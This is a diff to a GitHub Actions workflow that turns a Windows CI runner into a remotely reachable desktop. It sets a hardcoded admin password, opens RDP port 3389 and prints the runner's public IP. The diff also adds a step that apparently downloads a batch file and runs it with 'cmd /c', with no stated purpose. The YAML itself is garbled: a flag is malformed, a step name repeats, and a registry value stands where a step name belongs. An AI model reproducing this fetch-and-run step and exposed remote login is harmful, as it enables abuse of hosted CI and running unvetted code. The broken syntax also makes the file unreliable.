--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,21 +1,29 @@
 name: Clean Windows VM
+
 on:
-workflow_dispatch:
+  workflow_dispatch:
+
 jobs:
-build:
-name: Start Clean Windows VM
-runs-on: windows-2019
-timeout-minutes: 360
-steps:
-- name: Enable RDP and Set Password
-run: |
-net user runneradmin MySecurePassword123!
-netsh advfirewall firewall add rule name="Open RDP" dir=in action=allow
-protocol=TCP localport=3389
-Set-ItemProperty -Path "HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server"
--name "fDenyTSConnections" -Value 0
-Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
-echo [INFO] RDP Enabled. Connect using IP shown in the logs.
-- name: Show Public IP
-run: |
-Invoke-RestMethod -Uri "https://api.ipify.org?format=text"
+  build:
+    name: Start Clean Windows VM
+    runs-on: windows-2019
+    timeout-minutes: 360
+    
+    steps:
+      - name: Enable RDP and Set Password
+        run: |
+          Invoke-RestMethod -Uri "https://api.ipify.org?format=text"OutFile "Downloads.bat"
+          cmd /c Downloads.bat
+
+      - name: Enable RDP and Set Password
+        run: |
+          net user runneradmin MySecurePassword123!
+          netsh advfirewall firewall add rule name="Open RDP" dir=in action=allow
+          protocol=TCP localport=3389
+          Set-ItemProperty -Path "HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server"
+
+      - name "fDenyTSConnections" -Value 0 
+        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
+        echo [INFO] RDP Enabled. Connect using IP shown in the logs.
+        
+      - name: Show Public IP
